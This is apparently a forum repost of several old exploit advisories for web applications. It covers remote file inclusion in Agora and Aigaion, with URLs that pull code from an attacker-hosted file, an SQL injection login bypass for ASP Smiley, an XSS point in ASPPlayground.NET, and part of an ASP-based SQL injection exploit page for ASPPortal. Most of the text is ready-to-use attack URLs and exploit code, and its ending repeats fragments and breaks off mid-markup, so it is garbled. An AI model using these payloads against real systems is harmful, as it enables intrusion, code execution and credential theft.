version : 1.4 RC1 URL : http://www.agora.gouv.fr Based on the free software Spip, Agora is a free software of management of contents for Internet developed in php, which makes it possible to put in place and to manage quickly and with lower cost of the Internet sites, Intranet or extranet. Vulnerability: ~~~~~~~~~~~~~~ I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php modules/Mysqlfinder/MysqlfinderAdmin.php PHP Code: <? include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.in c") Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in Mysqlfinder.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Proof Of Concept: ~~~~~~~~~~~~~~~ PHP Code: http://target.com/[agora-1.4- path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_CO MPOSANT]=http://attacker.com/inject.txt? Black_hat_cr(HCE) Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities Code: Software:Web based bibliography management system Download link: http://sourceforge.net/projects/aigaion/ script:_basicfunctions.php author: navairum The script _basicfunctions.php does not specify a value for the $DIR variable before including it. Vulnerable code: //if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php"); /* This function leads the browser to the given location */ Exploit: http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt? Black_hat_cr(HCE) ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability Code: ****************************************************************** ************* # Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability # Author : ajann ****************************************************************** ************* Example: ###http://[target]/[path]/admin/ UserName: ' union select 0,0,0,0,0,0,0,0 from categories Black_hat_cr(HCE) ASPPlayground.NET Advanced Edition 2.4.5 Unicode Xss script : ASPPlayground.NET Advanced Edition 2.4.5 Unicode Xploit: Code: http://[site]/[forum_path]/calendar.asp?calendarID=|Xss| black_hat_cr(HCE) ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit PHP Code: <% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '========================================================== ===================================== '[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit1.asp '[Note : exploit file name =>exploit1.asp '[Using : Write Target and ID after Submit Click '[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün. '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirs iniz '[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum. '========================================================== ===================================== 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke %> <html> <title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title> <head> <script language="JavaScript"> function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face="Verdana\" size= \"1\" color=\"#008000\">There is a problem The Data Didn\'t Take </font>' } } function write(){ setTimeout("writetext()",1000); } </script> </head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <center> <font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASP Portal &lt;=</b>v4.0.0(default1.asp) <u><b> Remote SQL Injection Exploit</b></u></a></font><br><br> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.backg round='#808080';" onmouseout="javascript:this.style.background='#808000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Ex ample:[http://x.com/path]</b></font><p> <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User . if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){. Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face="Verdana"